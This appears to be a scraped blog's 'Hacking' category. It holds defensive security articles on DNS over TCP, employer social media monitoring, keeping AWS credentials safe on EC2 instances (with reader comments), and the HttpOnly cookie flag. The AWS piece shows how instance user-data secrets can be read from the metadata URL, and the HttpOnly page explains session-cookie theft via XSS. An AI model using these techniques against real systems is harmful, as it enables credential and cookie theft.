If you have permitted both TCP and UDP port 53 to traverse to and from your DNS servers and are still not having any luck, you may have an issue with your DNS implementation. It is conceivable that your DNS vendor has incorrectly interpreted the IETF RFCs and don't support TCP communications for DNS. There is an IETF draft called "DNS Transport over TCP - Implementation Requirements" which clarifies that "DNS resolvers and recursive servers MUST support UDP, and SHOULD support TCP". If this is the case then you should educate your vendor and then possibly consider switching to a new version of BIND, djdbns, or Secure64.

I wish you good luck deploying DNSSEC and IPv6 while using DNS over UDP and TCP port 53 with EDNS0.

Scott

'Hacking' 카테고리의 다른 글

Cydia Repositories  (7) 2012.08.05
SIM Card Cloning  (1) 2012.07.04
Employers on track to get more nosey with employees' social media lives  (1) 2012.06.01
How to Keep Your AWS Credentials on an EC2 Instance Securely  (0) 2012.01.28
HttpOnly  (0) 2011.12.10
Posted by CEOinIRVINE
l

By 2015, 60 percent of employers are likely to be eavesdropping on our social media selves to make sure our e-blabbing isn't poking security holes into their outfits, Gartner says.

According to Gartner's predictions, published on Tuesday in a report entitled "Conduct Digital Surveillance Ethically and Legally: 2012 Update", employers that are now only monitoring their brands and their marketing are going to broaden their foci to include tracking employees' social media doings as part of security monitoring.

As it is, Gartner says, less than 10 percent of organizations are currently monitoring their employees' social media activities as part of security monitoring. Instead, they're keeping an eye on security around internal infrastructure.

The cloud's going to change that, as will the Bring Your Own Device culture and the popular use of iGadgets in the workplace. As organizations' data migrate onto these technologies, security's got to follow, Gartner says.

Here's how Andrew Walls, research vice president of Gartner, put it in a press release:

Security monitoring and surveillance must follow enterprise information assets and work processes into whichever technical environments are used by employees to execute work. Given that employees with legitimate access to enterprise information assets are involved in most security violations, security monitoring must focus on employee actions and behavior wherever the employees pursue business-related interactions on digital systems. In other words, the development of effective security intelligence and control depends on the ability to capture and analyze user actions that take place inside and outside of the enterprise IT environment.

There certainly seems to be no shortage of internet usage monitoring tools. For example, here's a review site that has loads.

Social media blackboard, courtesy of ShutterstockBut here's the rub: how does an organization:

  1. Sift through the huge volume of irrelevant social media material to find actual threats;
  2. Keep its security staff from becoming creepy, voyeuristic stalkers; and
  3. Avoid breaking privacy laws (which, mind you, differ from state to state and country to country)?

Here's what Wall says:

While automated, covert monitoring of computer use by staff suspected of serious policy violations can produce hard evidence of inappropriate or illegal behaviors, and guide management response, it might also violate privacy laws. In addition, user awareness of focused monitoring can be a deterrent for illicit behavior, but surveillance activities may be seen as a violation of legislation, regulations, policies or cultural expectations. There are also various laws in multiple countries that restrict the legality of interception of communications or covert monitoring of human activity.

Beyond that, how are employees going to feel about all this monitoring?

My guess is they're going to start paying a lot more attention to privacy controls in social media, as well as the intricacies of what's legal for their employers to do.

If you're curious to know whether your employer can covertly and legally sift through your activity, say, by reading your encrypted email messages, a good resource is the Privacy Rights Clearinghouse's fact sheet on workplace privacy and employee monitoring.

As far as whether or not we can be fired over what we post on social media sites, the PRC says it depends on your employer's policies and your state's law.

A few helpful snippets from PRC on that matter:

Many companies have social media policies that limit what you can and cannot post on social networking sites about your employer. A website called Compliance Building has a database of social media policies for hundreds of companies. You should ask your supervisor or human resources department what the policy is for your company.

Some states, including California, Colorado, Connecticut, North Dakota and New York, have laws that prohibit employers from disciplining an employee based on off-duty activity on social networking sites, unless the activity can be shown to damage the company in some way. In general, posts that are work-related have the potential to cause the company damage.

"There is no federal law that we are aware of that an employer is breaking by monitoring employees on social networking sites. In fact, employers can even hire third-party companies to monitor online employee activity for them.

True that. In fact, as the PRC points out, in March 2010 a company called Teneros launched the "Social Sentry" service to track online activity of employees across social networking sites.

Interestingly enough, that service isn't available anymore. That might have something to do with cultural expectations about privacy.

Those expectations are reflected in some of the headlines that greeted Social Sentry's release: "Sayonara, Social Sentry: Bosses Can Spy for Free With Web Tools", "Teneros Blows a Chill over Social Networks", and "Big Brother is Indeed Watching You: The Spy Side of Social".

I would feel sorry for privacy-deprived employees, but you guys are, evidently, security poison.

CIO logoIt's like CIO reported on Wednesday: at Infosecurity London last month, attendees rated employees scarier when it comes to security than hackers, consultants, third parties, or domestic or foreign government agencies.

In other words, 71 percent of 300 polled attendees said that the people creeping around their own hallways were their biggest data breach threats. Bigger than domestic or foreign government agencies, bigger than Anonymous.

Network security risks from employees are pretty easy to grasp - employees could open a malware-containing email, act carelessly with company trade secrets or intellectual property, or bring insecure devices into the workplace.

Likewise, employees on social media can give away trade secrets or simply act like unprofessional idiots and thereby embarrass their employers. They can also click on scams in Facebook.

Should employers monitor their employees' social media use? It's hard to say no, given the potential security risks of social media.

But as we move toward workplaces with ever more pervasive surveillance, I'd suggest that organizations take the time to study the privacy laws. Those laws continue to evolve. You might be within your rights today but seen as a leering Big Brother tomorrow.

'Hacking' 카테고리의 다른 글

SIM Card Cloning  (1) 2012.07.04
DNS Vuln.  (1) 2012.06.15
How to Keep Your AWS Credentials on an EC2 Instance Securely  (0) 2012.01.28
HttpOnly  (0) 2011.12.10
Security Advisory  (1) 2011.12.05
Posted by CEOinIRVINE
l

How to Keep Your AWS Credentials on an EC2 Instance Securely

August 31, 2009 · 17 comments

If you’ve been using EC2 for anything serious then you have some code on your instances that requires your AWS credentials. I’m talking about code that does things like this:

  • Attach an EBS volume
  • Download your application from a non-public location in S3
  • Send and receive SQS messages
  • Query or update SimpleDB

All these actions require your credentials. How do you get the credentials onto the instance in the first place? How can you store them securely once they’re there? First let’s examine the issues involved in securing your keys, and then we’ll explore the available options for doing so.

Potential Vulnerabilities in Transferring and Storing Your Credentials

There are a number of vulnerabilities that should be considered when trying to protect a secret. I’m going to ignore the ones that result from obviously foolish practice, such as transferring secrets unencrypted.

  1. Root: root can get at any file on an instance and can see into any process’s memory. If an attacker gains root access to your instance, and your instance can somehow know the secret, your secret is as good as compromised.
  2. Privilege escalation: User accounts can exploit vulnerabilities in installed applications or in the kernel (whose latest privilege escalation vulnerability was patched in new Amazon Kernel Images on 28 August 2009) to gain root access.
  3. User-data: Any user account able to open a socket on an EC2 instance can see the user-data by getting the URL http://169.254.169.254/latest/user-data . This is exploitable if a web application running in EC2 does not validate input before visiting a user-supplied URL. Accessing the user-data URL is particularly problematic if you use the user-data to pass in the secret unencrypted into the instance – one quick wget (or curl) command by any user and your secret is compromised. And, there is no way to clear the user-data – once it is set at launch time, it is visible for the entire life of the instance.
  4. Repeatability: HTTPS URLs transport their content securely, but anyone who has the URL can get the content. In other words, there is no authentication on HTTPS URLs. If you specify an HTTPS URL pointing to your secret it is safe in transit but not safe from anyone who discovers the URL.

Benefits Offered by Transfer and Storage Methods

Each transfer and storage method offers a different set of benefits. Here are the benefits against which I evaluate the various methods presented below:

  1. Easy to do. It’s easy to create a file in an AMI, or in S3. It’s slightly more complicated to encrypt it. But, you should have a script to automate the provision of new credentials, so all of the methods are graded as “easy to do”.
  2. Possible to change (now). Once an instance has launched, can the credentials it uses be changed?
  3. Possible to change (future). Is it possible to change the credentials that will be used by instances launched in the future? All methods provide this benefit but some make it more difficult to achieve than others, for example instances launched via Auto Scaling may require the Launch Configuration to be updated.


How to Put AWS Credentials on an EC2 Instance

With the above vulnerabilities and benefits in mind let’s look at different ways of getting your credentials onto the instance and the consequences of each approach.

Mitch Garnaat has a great set of articles about the AWS credentials. Part 1 explores what each credential is used for, and part 2 presents some methods of getting them onto an instance, the risks involved in leaving them there, and a strategy to mitigate the risk of them being compromised. A summary of part 1: keep all your credentials secret, like you keep your bank account info secret, because they are – literally – the keys to your AWS kingdom.

As discussed in part 2 of Mitch’s article, there are a number of methods to get the credentials (or indeed, any secret) onto an instance. Here are two, evaluated in light of the benefits presented above:

1. Burn the secret into the AMI

Pros:

  • Easy to do.

Cons:

  • Not possible to change (now) easily. Requires SSHing into the instance, updating the secret, and forcing all applications to re-read it.
  • Not possible to change (future) easily. Requires bundling a new AMI.
  • The secret can be mistakenly bundled into the image when making derived AMIs.

Vulnerabilities:

  • root, privilege escalation.

2. Pass the secret in the user-data

Pros:

  • Easy to do. Putting the secret into the user-data must be integrated into the launch procedure.
  • Possible to change (future). Simply launch new instances with updated user-data. With Auto Scaling, create a new Launch Configuration with the updated user-data.

Cons:

  • Not possible to change (now). User-data cannot be changed once an instance is launched.

Vulnerabilities:

  • user-data, root, privilege escalation.

Here are some additional methods to transfer a secret to an instance, not mentioned in the article:

3. Put the secret in a public URL
The URL can be on a website you control or in S3. It’s insecure and foolish to keep secrets in a publicly accessible URL. Please don’t do this, I had to mention it just to be comprehensive.

Pros:

  • Easy to do.
  • Possible to change (now). Simply update the content at that URL. Any processes on the instance that read the secret each time will see the new value once it is updated.
  • Possible to change (future).

Cons:

  • Completely insecure. Any attacker between the endpoint and the EC2 boundary can see the packets and discover the URL, revealing the secret.

Vulnerabilities:

  • repeatability, root, privilege escalation.

4. Put the secret in a private S3 object and provide the object’s path
To get content from a private S3 object you need the secret access key in order to authenticate with S3. The question then becomes “how to put the secret access key on the instance”, which you need to do via one of the other methods.

Pros:

  • Easy to do.
  • Possible to change (now). Simply update the content at that
    URL. Any processes on the instance that read the secret each time will see the new value once it is updated.
  • Possible to change (future).

Cons:

  • Inherits the cons of the method used to transfer the secret access key.

Vulnerabilities:

  • root, privilege escalation.

5. Put the secret in a private S3 object and provide a signed HTTPS S3 URL
The signed URL must be created before launching the instance and specified somewhere that the instance can access – typically in the user-data. The signed URL expires after some time, limiting the window of opportunity for an attacker to access the URL. The URL should be HTTPS so that the secret cannot be sniffed in transit.

Pros:

  • Easy to do. The S3 URL signing must be integrated into the launch procedure.
  • Possible to change (now). Simply update the content at that URL. Any processes on the instance that read the secret each time will see the new value once it is updated.
  • Possible to change (future). In order to integrate with Auto Scaling you would need to (automatically) update the Auto Scaling Group’s Launch Configuration to provide an updated signed URL for the user-data before the previously specified signed URL expires.

Cons:

  • The secret must be cached on the instance. Once the signed URL expires the secret cannot be fetched from S3 anymore, so it must be stored on the instance somewhere. This may make the secret liable to be burned into derived AMIs.

Vulnerabilities:

  • repeatability (until the signed URL expires), root, privilege escalation.

6. Put the secret on the instance from an outside source, via SCP or SSH
This method involves an outside client – perhaps your local computer, or a management node – whose job it is to put the secret onto the newly-launched instance. The management node must have the private key with which the instance was launched, and must know the secret in order to transfer it. This approach can also be automated, by having a process on the management node poll every minute or so for newly-launched instances.

Pros:

  • Easy to do. OK, not “easy” because it requires an outside management node, but it’s doable.
  • Possible to change (now). Have the management node put the updated secret onto the instance.
  • Possible to change (future). Simply put a new secret onto the management node.

Cons:

  • The secret must be cached somewhere on the instance because it cannot be “pulled” from the management node when needed. This may make the secret liable to be burned into derived AMIs.

Vulnerabilities:

  • root, privilege escalation.

The above methods can be used to transfer the credentials – or any secret – to an EC2 instance.

Instead of transferring the secret directly, you can transfer an encrypted secret. In that case, you’d need to provide a decryption key also – and you’d use one of the above methods to do that. The overall security of the secret would be influenced by the combination of methods used to transfer the encrypted secret and the decryption key. For example, if you encrypt the secret and pass it in the user-data, providing the decryption key in a file burned into the AMI, the secret is vulnerable to anyone with access to both user-data and the file containing the decryption key. Also, if you encrypt your credentials then changing the encryption key requires changing two items: the encryption key and the encrypted credentials. Therefore, changing the encryption key can only be as easy as changing the credentials themselves.

How to Keep AWS Credentials on an EC2 Instance

Once your credentials are on the instance, how do you keep them there securely?

First off, let’s remember that in an environment out of your control, such as EC2, you have no guarantees of security. Anything processed by the CPU or put into memory is vulnerable to bugs in the hypervisor (the virtualization provider) or to malicious AWS personnel (though the AWS Security White Paper goes to great lengths to explain the internal procedures and controls they have implemented to mitigate that possibility) or to legal search and seizure. What this means is that you should only run applications in EC2 for which the risk of secrets being exposed via these vulnerabilities is acceptable. This is true of all applications and data that you allow to leave your premises. But this article is about the security of the AWS credentials, which control the access to your AWS resources. It is perfectly acceptable to ignore the risk of abuse by AWS personnel exposing your credentials because AWS folks can manipulate your account resources without needing your credentials! In short, if you are willing to use AWS then you trust Amazon with your credentials.

There are three ways to store information on a running machine: on disk, in memory, and not at all.

1. Keeping a secret on disk
The secret is stored in a file on disk, with the appropriate permissions set on the file. The secret survives a reboot intact, which can be a pro or a con: it’s a good thing if you want the instance to be able to remain in service through a reboot; it’s a bad thing if you’re trying to hide the location of the secret from an attacker, because the reboot process contains the script to retrieve and cache the secret, revealing its cached location. You can work around this by altering the script that retrieves the secret, after it does its work, to remove traces of the secret’s location. But applications will still need to access the secret somehow, so it remains vulnerable.

Pros:

  • Easily accessible by applications on the instance.

Cons:

  • Visible to any process with the proper permissions.
  • Easy to forget when bundling an AMI of the instance.

Vulnerabilities:

  • root, privilege escalation.

2. Keeping the secret in memory
The secret is stored as a file on a ramdisk. (There are other memory-based methods, too.) The main difference between storing the secret in memory and on the filesystem is that memory does not survive a reboot. If you remove the traces of retrieving the secret and storing it from the startup scripts after they run during the first boot, the secret will only exist in memory. This can make it more difficult for an attacker to discover the secret, but it does not add any additional security.

Pros:

  • Easily accessible by applications on the instance.

Cons:

  • Visible to any process with the proper permissions.

Vulnerabilities:

  • root, privilege escalation.

3. Do not store the secret; retrieve it each time it is needed
This method requires your applications to support the chosen transfer method.

Pros:

  • Secret is never stored on the instance.

Cons:

  • Requires more time because the secret must be fetched each time it is needed.
  • Cannot be used with signed S3 URLs. These URLs expire after some time and the secret will no longer be accessible. If the URL does not expire in a reasonable amount of time then it is as insecure as a public URL.
  • Cannot be used with externally-transferred (via SSH or SCP) secrets because the secret cannot be pulled from the management node. Any protocol that tries to pull the secret from the management node can be also be used by an attacker to request the secret.

Vulnerabilities:

  • root, privilege escalation.

Choosing a Method to Transfer and Store Your Credentials

The above two sections explore some options for transferring and storing a secret on an EC2 instance. If the secret is guarded by another key – such as an encryption key or an S3 secret access key – then this key must also be kept secret and transferred and stored using one of those same methods. Let’s put all this together into some tables presenting the viable options.

Unencrypted Credentials

Here is a summary table evaluating the transfer and storage of unencrypted credentials using different combinations of methods:

Transferring and Keeping Unencrypted Credentials

Some notes on the above table:

  • Methods making it “hard” to change credentials are highlighted in yellow because, through scripting, the difficulty can be minimized. Similarly, the risk of forgetting credentials in an AMI can be minimized by scripting the AMI creation process and choosing a location for the credential file that is excluded from the AMI by the script.
  • While you can transfer credentials using a private S3 URL, you still need to provide the secret access key in order to access that private S3 URL. This secret access key must also be transferred and stored on the instance, so the private S3 URL is not by itself usable. See below for an analysis of using a private S3 URL to transfer credentials. Therefore the Private S3 URL entries are marked as N/A.
  • You can burn credentials into an AMI and store them in memory. The startup process can remove them from the filesystem and place them in memory. The startup process should then remove all traces from the startup scripts mentioning the key’s location in memory, in order to make discovery more difficult for an attacker with access to the startup scripts.
  • Credentials burned into the AMI cannot be “not stored”. They can be erased from the filesystem, but must be stored somewhere in order to be usable by applications. Therefore these entries are marked as N/A.
  • Credentials transferred via a signed S3 URL cannot be “not stored” because the URL expires and, once that happens, is no longer able to provide the credentials. Thus, these entries are marked N/A.
  • Credentials “pushed” onto the instance from an outside source, such as SSH, cannot be “not stored” because they must be accessible to applications on the instance. These entries are marked N/A.

A glance at the above table shows that it is, overall, not difficult to manage unencrypted credentials via any of the methods. Remember: don’t use the Public URL method, it’s completely unsecure.

Bottom line: If you don’t care about keeping your credentials encrypted then pass a signed S3 HTTPS URL in the user-data. The startup scripts of the instance should retrieve the credentials from this URL and store them in a file with appropriate permissions (or in a ramdisk if you don’t want them to remain through a reboot), then the startup scripts should remove their own commands for getting and storing the credentials. Applications should read the credentials from the file (or directly from the signed URL if you don’t care that it will stop working after it expires).

Encrypted Credentials

We discussed 6 different ways of transferring credentials and 3 different ways of storing them. A transfer method and a storage method must be used for the encrypted credentials and for the decryption key. That gives us 36 combinations of transfer methods, and 9 combinations of storage methods, for a grand total of 324 choices.

Here are the first 54, summarizing the options when you choose to burn the encrypted credentials into the AMI:

As (I hope!) you can see, all combinations that involve burning encrypted credentials into the AMI make it hard (or impossible) to change the credentials or the encryption key, both on running instances and for future ones.

Here are the next set, summarizing the options when you choose to pass encrypted credentials via the user-data:

Passing encrypted credentials in the user-data requires the decryption key to be transferred also. It’s pointless from a security perspective to pass the decryption key together with the encrypted credentials in the user-data. The most flexible option in the above table is to pass the decryption key via a signed S3 HTTPS URL (specified in the user-data, or specified at a public URL burned into the AMI) with a relatively short expiry time (say, 4 minutes) allowing enough time for the instance to boot and retrieve it.

Here is a summary of the combinations when the encrypted credentials are passed via a public URL:

It might be surprising, but passing encrypted credentials via a public URL is actually a viable option. You just need to make sure you send and store the decryption key securely, so send that key via a signed S3 HTTPS URL (specified in the user-data on specified at a public URL burned into the AMI) for maximum flexibility.

The combinations with passing the encrypted credentials via a private S3 URL are summarized in this table:

As explained earlier, the private S3 URL is not usable by itself because it requires the AWS secret access key. (The access key id is not a secret). The secret access key can be transferred and stored using the combinations of methods shown in the above table.

The most flexible of the options shown in the above table is to pass in the secret access key inside a signed S3 HTTPS URL (which is itself provided in the user-data or at a public URL burned into the AMI).

Almost there…. This next table summarizes the combinations with encrypted credentials passed via a signed S3 HTTPS URL:

The signed S3 HTTPS URL containing the encrypted credentials can be specified in the user-data or specified behind a public URL which is burned into the AMI. The best options for providing the decryption key are via another signed URL or from an external management node via SSH or SCP.

And, the final section of the table summarizing the combinations of using encrypted credentials passed in via SSH or SCP from an outside management node:

The above table summarizing the use of an external management node to place encrypted credentials on the instance shows the same exact results as the previous table (for a signed S3 HTTPS URL). The same flexibility is achieved using either method.

The Bottom Line

Here’s a practical recommendation: if you have code that generates signed S3 HTTPS URLs then pass in two signed URLs into the user-data, one containing the encrypted credentials and the other containing the decryption key. The startup sequence of the AMI should read these two items from their URLs, decrypt the credentials, and store the credentials in a ramdisk file with the minimum permissions necessary to run the applications. The start scripts should then remove all traces of the procedure (beginning with “read the user-data URL” and ending with “remove all traces of the procedure”) from themselves.

If you don’t have code to generate signed S3 URLs then burn the encrypted credentials into the AMI and pass the decryption key via the user-data. As above, the startup sequence should decrypt the credentials, store them in a ramdisk, and destroy all traces of the raw ingredients and the process itself.

This article is an informal review of the benefits and vulnerabilities offered by different methods of transferring credentials to and storing credentials on an EC2 instance. In a future article I will present scripts to automate the procedures described. In the meantime, please leave your feedback in the comments.

{ 3 trackbacks }

Storing AWS Credentials on an EBS Snapshot Securely
July 19, 2010 at 4:13 pm
juraboy
January 3, 2011 at 11:13 pm
AWS Auto-Scaling and ELB with Reliable Root Domain Handling
January 24, 2011 at 10:56 am

{ 14 comments… read them below or add one }

1 Michael Fairchild October 18, 2009 at 9:04 pm

Another option you can add to the matrix is using an additional authenticate only aws user.
Create a new aws user, 'wimpy', but do not sign up for any services, and do not provide a credit card.
Although the new user cannot provisoin any aws resources, it does get an account id and access keys. Private s3 buckets and objects can be shared with this wimpy user. The wimpy user credentials can be provided in the userdata (or similar options mentioned) allowing boot scripts to retreive authenticated objects from s3, while not exposing the keys to the entire AWS kingdom.
A benefit of this approach, as compared to time expireing s3 urls, is that it can be used with autoscaling.

This method will not however give access to ec2-api commands such as ebs-attach-volume etc. If (and only if) access to these commands is required from the instance a separate monitor instance that does have the primary AWS keys can be used to proxy ec2 commands. The monitor host can listen for requests on the 10.* network from authenticated security groups, and run whatever additional verification is required before then executing the requested ec2-command. This reduces the exposure of your secret to a single instance.

Reply

2 shlomo October 18, 2009 at 10:09 pm

@Michael Fairchild,

Mitch Garnaat suggests a similar two-credential method in part 2 of his article (linked above). He calls them "Secret Credentials" ('wimpy') and "Double Secret Credentials" (the real ones).

The "monitor host" idea is similar to one I've been kicking around lately. My comment to Mitch's blog post outlines the idea, and some more detail is in the comments to the following blog:
http://elastic-security.com/2009/08/20/ec2-design-patterns-1-externalconsole/

Reply

3 6p00e54ee6e7b68834 November 10, 2009 at 11:58 pm

Given the constraints imposted by Auto Scaling, I think there's a better option than using signed URLs.

Signed URLs have the problem of a hardcoded expiration date, which means you need some external script which is vigilant in continually generating new signed URLs and updating your Auto Scaling Group parameters with the latest URL (which will need to be replaced again in X minutes). This puts robustness in direction opposition to security – the most secure solution mandates a short expiration time, which decreases the robustness of the system by requiring the external script to run frequently, without fail.

There's a better solution that keeps all the security goodness of signed URLs with none of the "signed-URL-generator-must-run-or-Auto-Scaling-will-fail" badness.

Instead of using signed URLs, use *public* URLs with a random path element:

https://s3etc/as0df98a0b980a98a0sd98f0a98sdfa/secret-user-data.txt

The URL is world-readable, but its path is unguessable (just like a signed URL).

Your Auto Scaling Launch config is initially configured with this URL.

Your external script then runs *whenever it wants*, creating a new random path & uploading your data to it, and then updating the Auto Scaling Launch Config to point at the new path. The script then deletes the file from the old path, so all running instances no longer have access to the secret data.

This can be combined with the "wimpy" auth scheme so that the URL doesn't even need to be public, and thus your attacker (if lucky enough to remote-exec on the machine before the URL dies) needs more than just 'curl' to get the secret data.

Reply

4 shlomo December 6, 2009 at 3:41 am

@6p00e54ee6e7b68834,

That's also a good suggestion. Even better would be to use a single-use URL, which would cease to work after the first retrieval. Then it would not need to be deleted.

Reply

5 Gabe March 30, 2010 at 5:02 am

AWS could help a lot by providing a way to generate credentials constrained to specific APIs. For example, if I have a machine that simply writes to an SQS queue, then I would generate credentials that only have access to the SendMessage API. If my machine needs to attach EBS volumes and access S3, I would generate credentials with only those permissions. That way in the case of a compromised system or elevation of privilege the damage done is limited to the rights granted in the credentials.

Reply

6 shlomo March 30, 2010 at 5:28 pm

@Gabe,

Absolutely, I agree that fine-grained credentials would help mitigate the risk of compromised credentials.

Reply

7 Yarin April 22, 2010 at 2:50 pm

Good article- any thoughts on using SimpleDB to store credentials?

Reply

8 shlomo April 22, 2010 at 3:18 pm

@Yarin,

SimpleDB requires AWS credentials to access. So it’s equivalent to the option “4. Put the secret in a private S3 object and provide the object’s path” discussed above.

Reply

9 Jack July 9, 2010 at 11:47 pm

If I generate a presigned URL with Amazon’s SDK to a private S3 object, I can access it in a regular browser but cannot wget/curl it and will give me an Error 403: Forbidden. Do you know why that is?

Reply

10 shlomo July 10, 2010 at 7:45 pm

@Jack,

Try putting the URL you give to wget in quotes. Some of these URLs have special characters that the shell interprets and quoting the URL argument will prevent the shell from interpreting those special characters.

Reply

11 Ewout July 12, 2010 at 9:38 pm

@Schlomo,

I have been struggling with the same challenge of getting AWS credentials on an EC2 instance. I came up with roughly the same list of options as you, until tonight, when I thought of another possibility:

when launching an instance, one can specify a snapshot to automatically create an EBS volume from and bind it to a block device. What if you created an EBS volume, put your credentials on it, create a snapshot from that, and then use the mentioned approach? One could use the user-data script (or whatever) to mount the block device and read the credentials. And when an instance terminates, by default the created EBS volume gets deleted (unless you turned it off in the –block-device-mapping option). Make sure the snapshot is private though. And I assume traffic between EC2 and EBS is secure, however I’m not sure of that, but there are many EBS boot images now, so that would be awkward then. Finally, it’s possible to encrypt the EBS volume at filesystem level, and pass the key for it in your user-data script; it doesn’t add security, but prevents someone else from reading the raw storage after having deleted the volume.

That still leaves the ‘How to Keep AWS Credentials on an EC2 Instance’ part, probably you would need to look at SELinux or AppArmor to fix that one, if EC2 even supports that (since EC2 provides the kernels). Also, one could use a read-only filesystem on the EBS volume and have some credentials broker there which takes proper measures to prevent unauthorized retrieving of the credentials; but no idea how to really secure that yet, if it is even possible (since root can do anything, but one could look at the pid of the process requesting the credentials, see which binary it belongs to and check whether the binary is untampered with for example, one could store a list of binaries and sha1sums in the read-only filesystem; but the filesystem itself might be unmounted/recreated/mounted as well).

Reply

12 shlomo July 19, 2010 at 4:16 pm

@Ewout,

Thanks for your comment! I’ve written an article showing how to implement this technique.

Reply

13 never mind November 6, 2010 at 9:47 am

You do realize that once the volume is mounted the credentials are available in clear text for any process with uid 0, right? (think “hackers” here) So what’s the improvement then? Let’s face it, the is *no* secure way to store clear text credentials. And you need them in clear text if you want to use them for AWS.

Reply

14 shlomo November 28, 2010 at 1:18 am

@never mind,

True, there’s no secure way to secure clear-text credentials.

The AWS Identity and Access Management features can be used to mitigate the risk of credentials being exposed.

Reply


'Hacking' 카테고리의 다른 글

DNS Vuln.  (1) 2012.06.15
Employers on track to get more nosey with employees' social media lives  (1) 2012.06.01
HttpOnly  (0) 2011.12.10
Security Advisory  (1) 2011.12.05
Web Penetration Testings  (0) 2011.12.04
Posted by CEOinIRVINE
l

HttpOnly

Hacking 2011. 12. 10. 05:00

HttpOnly

From OWASP

Jump to: navigation, search

Contents

[hide]

Overview

The goal of this section is to introduce, discuss, and provide language specific mitigation techniques for HttpOnly.

Who developed HttpOnly? When?

According to a daily blog article by Jordan Wiens, “No cookie for you!,” HttpOnly cookies were first implemented in 2002 by Microsoft Internet Explorer developers for Internet Explorer 6 SP1. Wiens,[1]

What is HttpOnly?

According to the Microsoft Developer Network, HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client side script accessing the protected cookie (if the browser supports it).

  • The example below shows the syntax used within the HTTP response header:
Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]

If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.

If a browser does not support HttpOnly and a website attempts to set an HttpOnly cookie, the HttpOnly flag will be ignored by the browser, thus creating a traditional, script accessible cookie. As a result, the cookie (typically your session cookie) becomes vulnerable to theft of modification by malicious script. Mitigating, [2]

Mitigating the Most Common XSS attack using HttpOnly

According to Michael Howard, Senior Security Program Manager in the Secure Windows Initiative group at Microsoft, the majority of XSS attacks target theft of session cookies. A server could help mitigate this issue by setting the HTTPOnly flag on a cookie it creates, indicating the cookie should not be accessible on the client.

If a browser that supports HttpOnly detects a cookie containing the HttpOnly flag, and client side script code attempts to read the cookie, the browser returns an empty string as the result. This causes the attack to fail by preventing the malicious (usually XSS) code from sending the data to an attacker's website. Howard, [3]

Using Java to Set HttpOnly

Sun Java EE supports HttpOnly flag in Cookie interface since version 6 (Servlet class version 3)[4], also for session cookies (JSESSIONID)[5]. Methods setHttpOnly and isHttpOnly can be used to set and check for HttpOnly value in cookies.

For older versions there the workaround is to rewrite JSESSIONID value using and setting it as a custom header[6].

String sessionid = request.getSession().getId();
response.setHeader("SET-COOKIE", "JSESSIONID=" + sessionid + "; HttpOnly");

In Tomcat 6 flag useHttpOnly=True in context.xml to force this behaviour for applications[7], including Tomcat-based frameworks like JBoss[8].

Servlet 3.0 (Java EE 6) introduced a standard way to configure HttpOnly attribute for the session cookie, this can be done by applying the following configuration in web.xml

<session-config>
 <cookie-config>
  <http-only>true</http-only>
 </cookie-config>
<session-config>
Using .NET to Set HttpOnly
  • By default, .NET 2.0 sets the HttpOnly attribute for
    1. Session ID
    2. Forms Authentication cookie


In .NET 2.0, HttpOnly can also be set via the HttpCookie object for all custom application cookies

  • Via web.config in the system.web/httpCookies element
<httpCookies httpOnlyCookies="true" …> 
  • Or programmatically

C# Code:

HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);

VB.NET Code:

Dim myCookie As HttpCookie = new HttpCookie("myCookie")
myCookie.HttpOnly = True
Response.AppendCookie(myCookie)
  • However, in .NET 1.1, you would have to do this manually, e.g.,
Response.Cookies[cookie].Path += ";HttpOnly";
Using PHP to set HttpOnly

PHP supports setting the HttpOnly flag since version 5.2.0 (November 2006).

For session cookies managed by PHP, the flag is set either permanently in php.iniPHP manual on HttpOnly through the parameter:

session.cookie_httponly = True

or in and during a script via the function[9]:

void session_set_cookie_params  ( int $lifetime  [, string $path  [, string $domain  
                                  [, bool $secure= false  [, bool $httponly= false  ]]]] )

For application cookies last parameter in setcookie() sets HttpOnly flag[10]:

bool setcookie  ( string $name  [, string $value  [, int $expire= 0  [, string $path  
                 [, string $domain  [, bool $secure= false  [, bool $httponly= false  ]]]]]] )

Web Application Firewalls

If code changes are infeasible, web application firewalls can be used to add HttpOnly to session cookies:

  • Mod_security - using SecRule and Header directives[11]
  • ESAPI WAF[12] using add-http-only-flag directive[13]

Browsers Supporting HttpOnly

Using WebGoat's HttpOnly lesson, the following web browsers have been tested for HttpOnly support. If the browsers enforces HttpOnly, a client side script will be unable to read or write the session cookie. However, there is currently no prevention of reading or writing the session cookie via a XMLHTTPRequest.

Note: These results may be out of date as this page is not well maintained. A great site that is focused on keeping up with the status of browsers is at: http://www.browserscope.org/. For the most recent security status of various browsers, including many details beyond just HttpOnly, go to the browserscope site, and then click on the Security Tab on the table at the bottom of the page. The Browserscope site does not provide as much detail on HttpOnly as this page, but provides lots of other details this page does not.

Our results as of Feb 2009 are listed below in table 1.

Table 1: Browsers Supporting HttpOnly
Browser Version Prevents Reads Prevents Writes Prevents Read within XMLHTTPResponse*
Microsoft Internet Explorer 8 Beta 2 Yes Yes Partially (set-cookie is protected, but not set-cookie2, see [14]). Fully patched IE8 passes http://ha.ckers.org/httponly.cgi
Microsoft Internet Explorer 7 Yes Yes Partially (set-cookie is protected, but not set-cookie2, see [15]). Fully patched IE7 passes http://ha.ckers.org/httponly.cgi
Microsoft Internet Explorer 6 (SP1) Yes No No (Possible that ms08-069 fixed IE 6 too, please verify with http://ha.ckers.org/httponly.cgi and update this page!)
Microsoft Internet Explorer 6 (fully patched) Yes Unknown Yes
Mozilla Firefox 3.0.0.6+ Yes Yes Yes (see [16])
Netscape Navigator 9.0b3 Yes Yes No
Opera 9.23 No No No
Opera 9.50 Yes No No
Opera 11 Yes Unknown Yes
Safari 3.0 No No No (almost yes, see [17])
Safari 5 Yes Yes Yes
iPhone (Safari) iOS 4 Yes Yes Yes
Google's Chrome Beta (initial public release) Yes No No (almost yes, see [18])
Google's Chrome 12 Yes Yes Yes
Android Android 2.3 Unknown Unknown No

* An attacker could still read the session cookie in a response to an XmlHttpRequest.

